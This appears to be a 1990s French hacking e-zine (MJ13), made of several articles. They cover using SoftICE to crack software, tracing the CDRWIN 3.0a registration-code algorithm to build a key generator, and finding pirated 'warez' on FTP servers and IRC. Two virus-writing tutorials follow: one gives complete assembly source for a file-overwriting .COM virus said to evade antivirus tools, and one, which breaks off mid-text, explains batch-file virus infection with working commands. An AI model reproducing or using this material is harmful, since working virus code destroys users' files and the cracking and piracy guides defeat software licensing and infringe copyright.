Ldr.exe pour Softice. Une petites correspondance des principales touches de fonction Softice/Win- ice: Action Winice Softice ------------------------------------------- Trace over F10 F8 (p) Trace in F8 F7 (t) Relance du soft F5 F9 jusqu'a BP Changement F6 F12 Code/instructions Voir ecran en F4 RS cours Avec Softice, vous pouvez reconfigurer les touches avec l'instruction FKEY. sous Winice, j'ai pas verifie, mais ca doit etre possible. +---------------------+ ¦ 3. Specificites Dos +----------------------------------------------------- +---------------------+ Un des principaux avantages de Softice, est qu'on peut faire un Breakpoint "a la volee": un petit Ctrl-D et hop! directement dans le code source du programme debugge a l'endroit ou il est rendu (pour Windows, voir 3). C'est tres pratique: par exemple, on peut faire un BP juste avant la demande de code pour pouvoir ensuite faire du pas a pas et mieux isoler la routine... Une autre specificite DOS, c'est qu'on peut mettre des Breakpoints sur les interruptions (BPINT) ce que l'on peux faire sous Win, mais qui me semble inutile (euh, si je me trompe --> email!). Passons aux problemes qui peuvent se poser sous Dos. Vous avez cracke un soft, vous recherchez les chaines hexadecimales et vous ne les trouvez dans aucun fichier! C'est probablement que le fichier est compresse: le fichier se decompresse "en route" pour gagner de la place et faire chier les crackers debutants. Il existe des compresseurs d'executa- bles classiques: Lzexe, Pklite, Diet, etc... Dans ce cas la, il faut utili- ser un decompresseur: UNP 4.11 (cardware) est celui que j'utilise le plus because il reconnait un grand nombre de formats. MAIS cela ne marche pas pour tous les softs. En effet, certaines boites utilisent une compression "maison", qui n'est pas reconnue par Unp ou un autre du meme style. La, pas de mystere, il faut utiliser un patch resident. Un resident, c'est un petit programme qui se charge en memoire qui modifie le programme pendant son exe- cution en memoire et qui permet de le patcher. Vous pouvez en faire vous me- me en asm ou utiliser Spoke (freeware) qui est un residant configurable as- sez efficace. Mais j'aborderai surement le cas des residents dans un pro- chain article. L'un des principaux emmmerdements sous Dos sont les programmes en mode pro tege: les fameux DOS4GW et autres. Je ne suis pas un maitre de ces trucs, mais en gros il permettent de faire un programme en 32 bits en s'affranchis- sant des problemes de memoire specifiques au Dos (merci Billou!). Le proble- me, c'est que Softice ne supporte pas du tout les programmes qui utilisent le mode protege. Alors il faut utiliser Watcom Debugger pour les softs qui utilisent le DOS4GW, et ce debugger, c'est pas un modele de puissance. Une autre astuce consiste a passer par une session Dos de Windows95. La, c'est un peu long a expliquer ici (surtout que je ne masterise pas du tout le mode protege, je n'ai que quelques "astuces" :( ) J'essairai donc (ou un autre membre, de vous donner quelques trucs dans un prochain article. +-------------------------+ ¦ 4. Specificites Windows +------------------------------------------------- +-------------------------+ La principale difficulte presentee par le debugging sous Windows, c'est la pose des Breakpoints. Sous Dos, un Ctrl-D et vous etes dans le code source, en direct. Sous Windows (3.x ou 95), quand vous faites un Ctrl-D, vous avez 1/13223145456677656^32 chance de vous retrouver a l'endroit ou vous voudriez etre: a l'endroit precis du code source ou en est le programme a cracker. Vous etes dans des putains de procedures Windows, a cause du multitache. Et ca, ben c'est deroutant au depart. Donc, la solution c'est de poser des Breakpoints sur des procedures Win u- tilisees par le programme, le plus proche possible de l'endroit a debugger. Par exemple, pour une boite de dialogue a supprimer, un "BPX DIALOGBOXPARAM" peut s'averer pas mal. Pour une "messagebox", un petit "BPX MESSAGEBOX" a des chances de vous aider. Et il y en a une sacree tripotee de fonctions Windows! Une autre solution, c'est de debugger le programme a partir du debut avec Wldr si le soft a deplomber s'y prette (boite de dialogue au lancement). Mais ces fonctions de Windows ont un avantage: elles simplifient le code source du programme, ce qui fait que tres souvent, les procedures d'enregis- trement, sans etre identiques, se ressemblent (mais vous inquietez pas, sous Windows aussi, y'a des programmeurs vicieux). Cela permet surtout d'acquerir certains reflexes en voyant des suites d'instructions qui sautent aux yeux une fois qu'on a un peu d'experience. Ah, oui, j'oubliais: pas la peine d'essayer de cracker des softs program- mes avec Visual Basic avec Winice. Vous pouvez reconnaitre ces softs parce qu'ils demandent les dll Vbrun100, Vbrun200,etc... En effet, les fichiers .exe de ces softs ne sont que des appels aux fonctions contenues dans les DLL si bien que vous vous retrouvez dans des boucles a la con en permanence. La seule solution qu'il y ait a ma connaissance soit un decompilateur speci- fique aux progammes Visual Basic, mais je n'ai pas approfondi. Mais ne vous inquietez pas: 999/100, les programmes Visual Basic, c'est de la daube :). +---------------+ ¦ 5. Conclusion +----------------------------------------------------------- +---------------+ Une conclusion? Merde, qu'est ce que je vais bien pouvoir leur dire ??? Ce article etait surtout fait pour donner une idee generale de la difference entre debugger sous Dos et sous Windows. Bien que Windows puisse faire peur au depart, c'est a mon avis injustifie. Il faut s'y faire au depart, mais ca reste assez logique dans l'ensemble et pas forcement plus dur a debugger que sous DOS ou il n'y a pas deux programmes qui se ressemblent. A part ca, ben, comme d'habitude: accrochez vous! Moi il m'a quand meme fallu pas mal de temps pour faire mon premier crack a peu pres propre. Pour me contacter, voyez mon autre article. +-------------------+ -------------------------------------------------------¦ Samson [Mj13/Dsk] ¦ +-------------------+ +------------------------------+ ¦ Initiation au VIRUS, cours 1 ¦ ----------------------¦ par +---------------------- +--<< :)---> UnK MnemoniK :)>--+ )> Quelques notions de base --------------------------- Avant toutes diffusions de parties ou de sources de virus , j'ai tenu a mettre deux trois choses au point 1> Qu'est-ce qu'un virus ??? << Ohhh mon dieux >>, c'est ce que j'ai entendu depuis que j'en fais , cependant un virus ne signifie pas la mort du systeme , ni le chaos total du diskque dur (ni la perte de la fat ) Les virus sont a la base des simples programmes mignon tout plein, s'auto-copiant sans avertir l'utilisateur , comme une bacille , son but principal est de se reproduire une fois ce but atteint , le virus fera quelques actions au bon vouloir du programmeur qui l'as conçus. types de virii : j'en ai classé (:Virii , pluriel de virus) 1) Les recover-virus : ces virus ont pour originalitée d'être très petit mais aussi très cons car ils réécrivent leurs codes sur les progs sans tenir compte du programme lui meme , ca tourne tout le temp au plantage royal et l'user vas donc lancer l'a-v , le plus c'est que le programme infecté est irrécupérable 2) Les résidents : ce sont les plus beau a mon avis , ce sont des programmes qui peuvent agir en arrière plan , ils sont lancé a partir d'un virus executable , une fois en mémoire , le virus peut se copier a son gré tenant tout de fois compte de ne pas géner l'user,ce qui rend ces virus extremement contagieux ,imaginez vous entrain de faire un dir , la , innocamment , le virus vient d'infecté 3 nouveaux fichiers , au bout de 10 minutes passée sous dos , un disque peut etre TOTALEMENT infecté sans que l'user ne s'apercoive de quoiquesesoit. 3) Les infecteurs d'executable :ces virus s'attachent au programme lui meme , ils se copient et puis repasse le controle au programme démandé , mode de propagation très répendu car assez facile a rélaiser . 4) les infecteur du boot :ces virus s'écutent au lancement du boot ce mode de propagation est assez intéréssant du fait qu'il n'est pas dérangé par le systeme d'exploitation , donc il infectera un systeme unix aussi bien qu'un system os/2 aussi bien qu'un systeme dos. 5) Divers : Toute une rimbabelle de virus se sont spécialisés dans divers style , par exemple des virus infecte des fichiers doc (comment ??? : simple , les fichiers doc contiennent des progs , car on peut attacher des progs a un doc grace aux ole , je salue celui qui en a eu l'idée ) , ya aussi les vers , virus qui se balladent dans les réseaux , des infecteurs de fichiers OBJ,Sys... 2> Creer ses virus pourquoi creer son virus ??? Les virus que vous pourrez trouver seront détéctable , bref > ca termine en couille . Les virus créé par des générateurs sont tous reconnus et meme leur variente , bref > ca sert a rien je voudis. Le seul moyen de distribuer un virus est de le creer soi meme ; -Oui mais comment on fait ?( avec la voix naze ) Il faut les programmers en assembleur -Oui mais moi je connais que le basic c'est con ca car pour pouvoir faire un virus dans des conditions acceptable, il faut un language de très bas niveau , l'assembleur s'impose , les autres languages genre deplhi , pascal ,... ne sont pas dutout adapté a ce genre de manipulation ,ceci dit j'en ai deja vu en C et en C assembleur mais très rares sont-ils. -Ok , l'assembleur ca se mange comment ? L'A86 est un compilateur shareware , mais il est très peu utilisé dans les virii qui sont le plus souvent compilé en TASM (<^²=- WaReZ oblige -=²^>) -C'est dur a faire ? Non c'est pas dur , bien sur , vous ne ferez pas des gros masterboot tout de suite , je vous montrerais des Executables et chaque fois une nouvotée pour l'améliorer , des routines intéréssente , etcetc -Et si je veux le tester mes virus ??? faites le sur des bornes isolées , le vieux 286 du grenier avec son disque de 40 megs fera l'affaire , de cette manière , vous pourrez toujours controler votre virus (comme dans les films , 1 virus laché dans la nature si il est très contagieux sera totallement incontrolable ) Tips: - J'utilise le norton commander du dos, ca facilite bocoup l'édition de ces virus , - lisez les issues 1-14 de 40Hex et ceux de VLAD , ils sont très pointus sur les nouvelles manières d'infections mais ils fournissent les codes Hexa et assembleur de virus (: , In Inglich ,,, - vous pouvez toujours reprendre des sous-fonctions pour autant que celle ci ne soient dans les premiers octets du virus car ceux-ci sont utilisés pour la désinfection . About Me -------- Je traine souvent sur le net , si vous etes sur aol , lancez un méssage éclair à VGeNeRaLV , sinon je passe mon temp sur kali a jouer sous le nom de General3 , je suis parfois sur l'IRC mais très rarement , sur L'udernet . Mail me at : zorohack@hotmail.com DédiKaCEs: Faucon , Uther , Stork , Aries , Fade , Knuck , Till , Flavor , Lithium , SoS , Arnold , JAYCEuWZ , HxMajor , WzEuRoPe , Jayce , Yak , HuMaNBOmb , Magic , Pablo , Zak , Znel , Marave , Mana , Cybertech et toute la clique Prochain episode : un recover-virus comme il faut << :)---> UnK MnemoniK :)> ******************************************************************************* Comment débusquer les warez sur le net en 10 leçons Ecrit-a-la-va-vite-parce-que-j'ai-pas-le-temps. par Shybe ************************************* ************************************ Je vais donc énoncer dans ce document les methodes les plus connues pour trouver facilement ce qui est le plus croustillant pour nous: les warez. 1) Introduction: Il n'y a pas si longtemps, Internet était un réseau réservé aux professionnels. On ne trouvait pratiquement que des données scientifiques. De nos jours toutes sortes de bidochons se baladent sur le Web et Internet est en train de devenir un merveilleux foutoir ou l'on trouve pratiquement ce qu'on veut. Le probleme est de savoir OU trouver ce qui nous interesse. D'abord un peu de vocabulaire pour les débutants: -Warez: Terme désignant un logiciel croustillant. C'est à dire sympa, cool, interessant, registered, pompable, jouable et nouveau. -Appz, Gamez, Sitez: termes désignants respectivement: Applications warez, Jeux warez, Sites FTP warez (ne riez pas y'en a qui ne comprenent pas bien l'anglais.) -Oldiez ou Oldies: Généralement les vieux jeux et applications. -"This site sucks!": "Ce site suce!" ou "ce site est nul!" géneralement écrit par quelqu'un qui vient de fouiller sur un site FTP sois-disant warez et qu'en fait le site est vide ou ne contient que des oldiez ou des merdes. Si vous voyez ca dans un site FTP warez, il y a fort a parier que le site ne vaut pas un clou. -"Fuck U lamerz!": "Allez vous faire enculer, bande de morveux!" Ou plus exactement un message d'injure d'un Elite (vois plus loin) qui grogne parce qu'il n'a pas trouvé son bonheur dans un site FTP dit warez. -"Empty site!": Site vide. Ne contient rien ou que des merdes. -"Loaded site!": "Site rempli!" Dit d'un site lorsqu'il contient des warez. -"Fat ass site!": "Site warez gros cul!" ou "site 'poid-lourd!'" En gros: YA BON. Terme généralement utilisé par unElite qui a trouvé un site FTP warez fantastiquement bourré de warez. Donc a essayer en premier. La société sur le net par ordre croissant d'importance: -Lamerz: On est dit lamer lorsqu'on pompe par exemple impunément 20 mo de warez sur un site FTP sans envoyer quoi que ce soit. Sur le net, tout le monde traite tout le monde de lamer. C'est en fait une espece de coutume. Un lamer est en fait un synonime péjoratif de "débutant". -Trader: Un gars appartenant a un "groupe de warez" (distributeur de warez payant ou pas) qui est chargé de vendre ou d'échanger les warez. Les traders sont en général considérés de haut par les "élites" (voir ci-dessous) car ils se tapent le sale boulot. Ce sont en fait des "dealers" de warez. -Elite: Un bien grand mot pour désigner les pros, la "haute société" de la micro dans les coders, crackers et autres hackers. On est generalement dit élite lorsqu'on fait partie d'un groupe de traders. Les gars qui se disent élite sont dans 90% des cas des craneurs qui aiment dire "j'ai des warez et j'en ai autant que j'en veux." dans les newgroups. Remarque importante: Les 10% de vrai "membres élite" ne parlent JAMAIS d'eux et ne se font pas remarquer. --> Dans la pratique, un élite est un type capable de débusquer SOIS-MEME ses warez sans être obligé de pleurer dans les chaussettes d'un autre type qui, lui, le peut. (Ce que nous avons tous fait dans nos débuts) Nous désigneront donc courrament un élite un gars qui cherche des warez. II Methodes de recherche: 1) FTPsearch 3.3: ----------------- Lorsque j'ai commencé a cherche des warez sur le net, j'ai d'abord utilisé les moteurs de recherches connus (Alta-vista, Yahoo...). Je me suis vite rendu compte qu'il existait des milliers de sites WWW contenant des listes de sites FTP warez. Malheureusement, je me suis aussi vite rendu compte que beaucoup n'était pas à jour, ou que les FTP ne marchaient plus. Il m'a donc fallu chercher d'autres moyens de trouver des sites frais. Un jour j'ai entendu parler de FTP-Search 3.3. (ftpsearh.ntnu.no) FTP-Search est surement le moteur de recherche de FTP le plus puissant sur le net: Il suffit de chercher un mot clef, et s'il trouve ce mot DANS L'ADDRESSE d'un site répertorié, hop on a la réponse. Il est donc facile, en théorie de trouver des sites warez! Il suffirait de chercher des noms de repertoires se trouvant courrament dans les sites pour tomber sur les warez. Le seul probleme, et de taille, c'est que FTPsearch garde souvent en liste des sites périmés. On a donc souvent l'IMPRESSION trompeuse d'avoir trouvé LE site qui booste et qui tue, mais en fait si on veut pomper, ou même simplement acceder REELLEMENT au site (avec un client FTP), eh ben ça marche presque jamais! (comme par exemple ftp.gpl.net, un site qui A existe il y a quelque temps, et qui contenait un gros morceau, mais qui a malheureusement fermé!) FTPsearch garde en memoire le contenu des sites A UN MOMENT DONNE, ce qui fausse completement l'idée qu'on peut avoir de son véritable contenu! (Voir des fichiers qui n'existent plus depuis longtemps, ou encore ne pas voir des fichiers qui viennent d'apparaïtre!) IL EST DONC IMPERATIF, AVANT TOUT EXCITATION SOUDAINE, de VERIFIER l'état du site: en pratique cliquer sur l'addresse complete en bleu dans FTPsearch. (avec netscape ou explorer) Si le site ne répond pas, c'est rapé. S'il répond, vous pouvez commencer à en pisser de joie. Pour une recherche aisée, il faut savoir bien configurer FTPsearch: 1) Passer en mode "expression match" (donne une simple liste contenant uniquement les mots-clée se rapprochant le plus du votre, pratique pour trier rapido) 2) Régler l'ordre d'affichage de façon à avoir la taille VISIBLE (en premier par exemple. C'est important: ca permet de trier rapidement les fichiers en fonction de leur taille: si vous trouver un "quakefull.zip" qui fait 3 ko par exemple, on peut être sur que ça n'est pas la commerciale! 3) Régler l'ordre d'affichage sur "date, host and name" de façon a avoir les sites les plus récents (et donc les plus susceptible de contenir quelque-chose) en HAUT de la liste. 4) SAUVEGARDER LA CONFIG! (sinon rebelotte, et c'est chiant a la longue) --> Je vais maintenant faire une liste non exaustive des mots clefs les plus utilisés dans les sites, ou dans les noms de répertoires: ( "_" désigne un ESPACE ) .wrz wrz .apz apz .warez warez .appz appz .gamez gamez .sitez sitez .oldiez oldiez .reqz reqz ou reqs ou required serialz crackz stuffes ou stuffz iRC ) iRC96 ) ou .iRC??? iRC'96 ) .nwc ou .NwC ou NwC etc... fate96 risc ... _. _.. _... etc... Il est aussi intelligent de chercher: uploaded by upload by upped by (le plus courrant) up by reqz filled by filled by Ou pour des warez amiga: ------ amiga-warez amiwarez .amiwrz amiwrz aaa a-warez Regardez dans les répertoires: .unreadable unreadable test (je sais y'en a beaucoup, mais ca vaut le coup!) .temp temp --> Les groupes de warez: nous recherchons ici les fichiers communs acompagnant les warez en général: fate.nfo | irc96.nfo fate96.nfo | razor.nfo ror.nfo | risc.nfo dod.nfo | tdu.nfo ucf.nfo | tdujam.nfo ucf.com /.exe | tdujam.exe --> Les extensions de fichiers: .arj / .a01 etc... .r00 / .r01 etc... .000 / .001 (TDUjam) .dms (pour les warez amiga) .lzx (idem) --> Les entêtes de fichiers: ( à coupler avec les extensions ) tdu-*.* tdu*.* ror*.* dod-*.* dod*.* rsc*.* *ucf.* Le mieux est de chercher des noms de fichiers appartenant a des warez connues et répandues, par exemple: dn3d.* dn3d13r.* duke3d.* duke3dr.* quake101.zip ou arj/a01 etc... quakefull.* z.arj psp40.arj ou zip psp311r.* gw32r.zip (game wizard 32 :)) ) photoshop.* Pour les amigafans: tvpaint*.lzx dpaintV.lzx dc-*.* et dc-lw4.* ou dc-lw5c.* (lighwave 4 ou 5 bc) real3d.* etc etc... Faites jouer votre imagination! Essayez aussi, si vous cherchez quelque chose de préci, de combiner entêtes et abrégés, par exemple: Je cherche Speedy Rom. Dans ce cas on cherche un peu partout et on trouve dodsprom.zip... Remarque: les caractères tels que '*' ou '?' ne sont pas reconnus par FTPsearch. Pour utiliser les notations étendues, vous serez obligé d'utiliser la "Regular syntax" qui est différente de celle utilisée par DOS. Exemples de conversion: ? <=3D=3D> . * <=3D=3D> .* Vous trouverez un résumé complet de la syntaxe dans l'aide au site de FTPsearch, ou en cliquant sur "syntax" qui est en surbrillance si mes souvenirs sont bons. Bon avec ça vous devriez pouvoir trouver à peu près 1 site warez par jour! 2) Les listes de sites: ----------------------- Il est assez facile de trouver des listes de sites warez dans les répertoires "sitez" des sites warez déja trouvés. Le probleme, toujours le même: les mises à jours. Les sites warez ne durant généralement pas longtemps (1 a 2 jours pour les warez PC et une a deux semaines pour les warez AMIGA) il est impératif de trouver des listes contenant des sites datant du jour même. Pour cela: trois solutions: 1) De loin la plus facile: Aller sur mon site, dans mes linkz, et fouiller dans la section "warez FTP listz". Vous trouverez surement 2 ou 3 sites contenant des listes de FTP classés par date. (certains sont même mis-a-jour 2 ou 3 fois par jour!!!) Par exemple: www.netwarez.com, section WAREZ. (excellent, ce site, d'ailleur) 2) Chercher avec FTPsearch ou autre moteur de recherche des fichiers genre... 0-day.txt 0day.txt 0daywrz.txt 0.day 0day.wrz etc... ou: siteZ.* sitelist.* sitezlst.* (extensions txt/doc/nfo etc...) ...ou même des fichiers comme WS_FTP.INI qui contiennent des listes de sites compatibles avec Ws_ftp. Si WS_FTP.INI se trouve dans un répertoire zarbi genre _.. ou sitez, pas de doute! 3) Ce qu'on appelle dans notre jargon "trader en IRC" C'est-a-dire échanger des listes de sites contre d'autres listes, ou des warez. Par exemple dans les channels comme #warez666 chez undernet.org, on peut souvent trouver des addresses IP de sites appartenant a des particuliers... Vous lui envoyez quelque-chose qu'il cherche et il vous file l'acces... III La machine infernale: Comme vous avez pu le voir, lorsqu'on trouve un site warez, on trouve aussi de temps en tmeps des listes d'autres sites FTP. Il est donc assez facide de maintenir quelques sites toujours à dispo pour trouver ce qu'on veut. Le mot de la fin: J'espere qu'avec tous ces trucs vous trouverez votre bonheur... Cependant n'oubliez pas que vous n'=êtes pas seul a pomper sur un site FTP, pensez aux autres: remplissez les "reqz". Perso, je laisse un repertoire genre Upped by -=3D Shybe =3D- shybe@geocities.com. Comme ça il arrive qu'on se fasse des potes sur un site, et qu'on échange des listes etc... A vos modems Amicalement -=3D S H Y B E =3D- NB: Désolé pour l'aurtaugraf. ******************************************************************************* | TRACAGE DE CRWIN3.0a | | CREATION DE REGISTER | | PAR | | DONGLE KILLER | | ALLIGATOR427 | ****************************************************************************** Voici donc le tracage de CDRWIN 3.0a, qui vous permets de trouver les BPX du premier coup... le calcul restera le meme sur toutes les versions suivantes, vous permettant d'avoir votre registrer... sorry Jeff... Nous l'avons tracé tous les 2, a des moments et endroits differents... rendons ces lauriers a cesar, qui a poussé le "vice" en creeant un KEY-REGIS. Bravo DONGLE!!! ****************************************************************************** 0137:00406345 CALL 0043789D Renvoie eax=3Dlongueur du nom 0137:00406354 CALL 0043789D Renvoie eax=3Dlongueur email 0137:00406363 CALL 0043789D Renvoie eax=3Dlongueur code 0137:0040636C CALL 00424960 Renvoie eax=3Dvaleur hexa du code 0137:00406378 PUSH EAX Sauvegarde de la valeur du code en pile 0137:00406381 CALL 00411E10 Vérification du code Détail de la vérif. : 0137:00411E22 CALL 00412150 Vérification si code ok, alors eax<>0 -------------------------------------------------------- Détail du CALL 00412150 les adresses du nom, email et code ont été empilée juste avant l'appel!! 0137:00412150 MOV EDX,[ESP+04] EDX pointe sur le NOM 0137:00412160 REPNZ SCASB On recherche la fin de chaine NOT ECX DEC ECX ECX=3DLongueur du nom CMP ECX,06 Longueur inférieure =à 6 caracs ? 0137:0041216A MOV EBX,[ESp+14] EBX pointe sur l'email ....idem : vérif longueur.... -------------------------------------------------------- 0137:00412183 PUSH EDX On empile l'adresse du nom CALL 004121E0 Calcule un code un partir du nom nom= Vous choisirez.. eax=xxxxxxxxxxx .... .... PUSH EBX on empile l'adresse de l'email OR EDI,ESI Inversion de la partie haute=20 et de la partie basse de eax par rotations et addition finale Résultat dans ESI !!! 0137:0041219B CALL 004121E0 Calcule un code à partir de l'email (grace a l'adresse empilée avant) email= vous choissirez! eax=xxxxxxxxxx XOR EDI,EAX OU EXCLUSIF des 2 résulats nom et email EDI=xxxxxxxxxx en base 10 EDI=xxxxxxxxxxx < le code est la!!!! La suite récupére la valeur du code saisi qui avait été empilée bien avant et la compare a la valeur ci-dessus. -------------------------------------------------------- # Routine calcul register : ....détails oubliés.... EBX pointe sur la chaine ECX =3D longueur chaine DI =3D longueur chaine 0137:00419199 XOR EDX,EDX EDX=3D0=20 0137:0041919B MOV DL,[EBX]=09 Lecture premier carac. exemple : DL=3D50 carac. 'P' INC EBX Pointe sur carac. suivant MOV ECX,EDX SHR EDX,02 2 décalages à droite sur EDX 0101 0000 --> 0001 0100 =3D 14 XOR ECX,EAX OU exclusif entre eax et ecx dans ecx.=20 SHR EAX,04 4 décalages à droite de eax AND ECX,0F Et logique sur ECX, on garde les 4 bits de poids faible MOV ECX,[ECX*4+ESI] XOR ECX,EAX Ou exclusif entre ecx et eax LEA EAX,[EXCX*4+0000000] EAX=3DECX*4 SHR ECX,04 4 décalages à droite de ecx XOR EAX,EDX Ou exclusif entre ecx et edx AND EAX,3C ET logique sur eax bits 5,4,3,2 conservés MOV EAX,[ESI+EAX] Lecture d'un code dans une table point=E9e par ESI+EAX EAX maxi =3D 3C (cf AND 3C), la table aura donc 16 mots de 32 bits XOR EAX,ECX Ou exclusif entre eax et ecx vers eax DEC DI Test fin de chaine JNZ 419199 Reboucle si pas la fin de chaine Table pointée par ESI : (cette table est dans CDRWIN.EXE) ----------------------- ESI+00 : 00 00 00 00 7E 88 3E 1C ESI+08 : FC 10 7D 38 82 98 43 24 ESI+10 : F8 21 FA 70 86 A9 C4 6C ESI+18 : 04 31 87 48 7A B9 B9 54 ESI+20 : F0 43 F4 E1 8E CB CA FD ESI+28 : 0C 53 89 D9 72 DB B7 C5 ESI+30 : 08 62 0E 91 76 EA 30 8D ESI+38 : F4 72 73 A9 8A FA 4D B5 ET vala.. comment ca s'est compliqué????? ******************************************************************************* ^°²;,.,;²°^°²;,.,;²°^°²;,.,;²°^°²;,.,;²°^°²;,.,;²°^°²;,.,;²°^°²;,.,;²°^ Virus exemple N°1 UnK MnemoniK ----------------- Voila , j'ai essayer de détailler ici un virus très simple et en meme temp très petit , l'astuce de cette petite taille est que le virus se propage en écrasant directement sur le fichier , ne tenant pas compte du programme infecté , ici , quand on lancera le fichier , il retournera directement sous le prompt , bref on s'apercevra assez vite de l'infection , voir que l'on réinstallera completement les progs infectés , ce virus est déja a moitié comdamné , il serait toujours amusant de le lacher sous c:\dos qu'on voie la tête du technicien informatique ( que perso je n'arrive jamais a pifer , genre le type : euuuh , ce réseau est optimisé (:ouarf le vocabulaire) pour Ou-indoze95 , nos plateformes sont à la pointe de la technologie , hum hum et ne touchez pas a ce clavier ; ou bien le type qui arrive quand tu veux t'amuser sur une bécanne de démonstration ou ya un pseudo internet qui en fait n'est qu'une page html sur le disque ventant les mérites de la compagnie après ce bref interlude , voici les explications ************************************************************************** cette partie n'est que du blabla pour que turbo assembleur ne viennent pas raler avec ses gros sabots - code segment assume cs:code,ds:code,es:code,ss:code org 100h main proc near - La routine start a pour but de mettre en 9Eh le nom du premier fichier'*.com'se trouvant dans ce repertoire grace a la subfonction 4Eh de l'intéruption 21h (celle du dos ) , le fichier n'infectera pas les fichiers cachés ni ceux en lecture seule , pour cela , il faut placer dans CX un code binaire 00000011B ou 2h - START: MOV AL,0 MOV AH,4Eh MOV DX,OFFSET COMFILE INT 21H JMP INFECTE ; saut sur le procéssus d'infection - les routines close puis plus ont la fonction de fermer (3Eh) le fichier ouvert et de rechercher le prochain fichier com sur le repertoire actuel (4Fh) , 4Fh n'a besoin d'aucune préparation car elles sont fixée avec 4Eh - CLOSE: MOV AH,3EH INT 21H PLUS: MOV AH,4FH INT 21H OR AL,AL JNZ BYE - ici le procéssus d'infection étant très primaire , il se décompose comme étant l'anti-réinfecteur et infecteur , je m'explique , il ne faut pas que le virus s'écrase tout le temp sur le meme fichier car l'infection serait impossible puis si le test parait négatif il infecte le fichier - INFECTE: MOV AX,3D02H MOV DX,OFFSET 9EH INT 21H MOV BX,AX - /¦\ vous avez ici l'ouverture du fichier , a partir ce moment les actions d'écriture lecture sont possible sur le fichier , comme dans le basic ce fichier est affecté un numéro placé en AX mais ca ne suffit pas car pour les prochaines intéruptions , le numéro du fichier doit se trouver en BX - MOV AH,3FH MOV CX,2 MOV DX,OFFSET MTEST INT 21H CMP WORD PTR MTEST,00B0H - routine de test d'infection comme comparaison , nous allons lire les 2 premiers octets (3Fh) et puis les comparer avec ceux du virus (ici B000h (ne pas oublier d'inverser les octets)) , pour ma part j'y ai mis une valeur fictive que j'ai remplacé une fois compilé , et j'ai ensuite recompiler avec B000h , a noter que MTEST contient les deux premiers octets du fichier Oui mais si un fichier a déja 00B0H comme premiers octets? Les chances restantes sont de 1/65535 , c'est a dire que l'on ne s'en inquiete pas , si le test parait positif , il vas a close - JZ CLOSE MOV AX,4200H MOV CX,00 MOV DX,00 INT 21H - repositionnement du pointeur au début du fichier ( 42H ) - MOV AH,40H MOV CX,84 ; taille du prog MOV DX,OFFSET START INT 21H - ici écriture de tous les octets depui start sur le fichier - BYE: RET - informations utiles au programme - COMFILE: DB 'coui*.com',0 MTEST: DW ? main endp code ends end main **************************************************************************** j'éspère que vous aurez compris les mécanismes de ce virus très petit a cause de sa simplicité , pour le compiler faites tasm mj13.asm puis tlink mj13.obj , amusez vous a refaire ou améliorez ce virus Je garanti qu'a la sortie de cet article de MJ13 , ce virus n'est pas reconnu par les anti-virus NB : la version MJ13 n'infecte que les coui*.com tandis que la 0B infecte tous les fichiers com Prochain épisode : ca se transforme en infecteur COM *** Envoyez vos questions ou mes bugs a Zorohack@hotmail.com Spécial thanks a chico , si vous avez rien a faire allez voir les articles de phalcon/skism et d'autres sur jesaisquellepage (:Alta vista ca existe non? By -¦ UnKM ¦- Thanks to Samson ^°²;,.,;²°^°²;,.,;²°^°²;,.,;²°^°²;,.,;²°^°²;,.,;²°^°²;,.,;²°^°²;,.,;²°^ ****************************************************************************** ------------------------------------------------------------------------------ ---- VIRUS BATCHS - Un peu d'originalité coté virus ---- ------------------------------------------------------------------------------ * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * DISCLAMER: Vous ètes seul responsable de l'utilisation de ce * * * * document, et son auteur n'est en aucun cas responsable d'une * * * * mauvaise utilisation par autrui.L'ecriture de ce texte n'est * * * * pas illégale en France mais la création de virus du type * * * * decrit l'est. Les virus (éventuellement) fournis avec ce * * * * logiciel ne sont là qu'à but de démonstration, et ne doivent * * * * pas être utilisés. * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * WARNING: Nécessite une BONNE connaissance du batch et du DOS. NOTE: Mon but n'est pas vraiment de decrire comment créer un virus batch fonctionnel (pour ça lisez les fichiers C-WORM.TXT, V-WORM.TXT, VIRAL.TXT) mais plutôt de vous donner des conseils généraux et d'expliquer certains passages ardus de cette programmation. +-----------------+ ¦ 1/ iNTRODUCTION ¦ +-----------------+ C'est vrai ça, il existe des milliers de virus EXE et COM, mais des virus batchs (BAT) il en existe une vingtaine au grand maximum. Pourquoi? Ils sont certes lents, pas TSR, gros, et il existe peu de fichiers BAT sur un même ordinateur. Cependant presque aucun anti-virus ne peut détecter les virus batchs, ce qui supprime d'un coup tout besoin de moteur de cryptage et de routines d'anti-debugger. De plus avec un bon niveau et de l'expérience (beaucoup) ont peu faire des choses grandioses: à votre avis un virus batch peut-il: 1) Etre résident? 2) Infecter des fichiers EXE et/ou COM? 3) Profiter des fautes de frappe pour s'activer? 4) Se dissimuler d'Edit et de DIR? 5) Détecter 4DOS et réagir en l'exploitant? 6) Etre un infecteur rapide? La réponse est OUI pour toutes ces questions, et j'affirme que seul un utilisateur avancé peut les detecter si SmartDrv (ou autre) est en mémoire. +-------------------------+ ¦ 2/ TECHNIQUES GENERALES ¦ +-------------------------+ En ce qui concerne leur programmation proprement dite il faut avant toute chose pour discerner le virus du code il faut rajouter une chaine de caractères identique à toutes les lignes du virus pour le différencier du programme infecté. Exemple: +----------------------------------------+ ¦ @Echo off %Virus% ¦ <- Début du virus ¦ ... %Virus% ¦ ¦ 'instructions du virus' %Virus% ¦ ¦ goto EndVirus ¦ <- ici la chaine est Virus ¦ ¦ ¦ :EndVirus ¦ <- Fin du virus ¦ @Echo off ¦ <- Début du programme ¦ cls ¦ ¦ echo Programme infecté ¦ +----------------------------------------+ Pour extraire le virus seulement dans un fichier il suffira de taper +----------------------------------------+ ¦ TYPE %0.BAT | Find "Virus" >NewVir.bat ¦ +----------------------------------------+ %0.BAT représente le nom du fichier qui vient d'etre lancé, sous 4DOS %0.BAT peut être une erreur et %0 le bon il faut donc déterminer lequel employer: +----------------------------------------+ ¦ SET Good=%0 ¦ ¦ If exist %0.BAT Set Good=%0.BAT ¦ ¦ If exist %0 Set Good=%0 ¦ +----------------------------------------+ et ensuite seulement: +----------------------------------------+ ¦ TYPE %Good% | Find "Virus" >NewVir.bat ¦ +----------------------------------------+ Pour infecter un fichier il ne vous restera qu'à taper: +----------------------------------------+ ¦ Ren file.bat file.old ¦ Le virus sera placé AVANT le ¦ Copy Newvir.bat + file.old file.bat ¦ 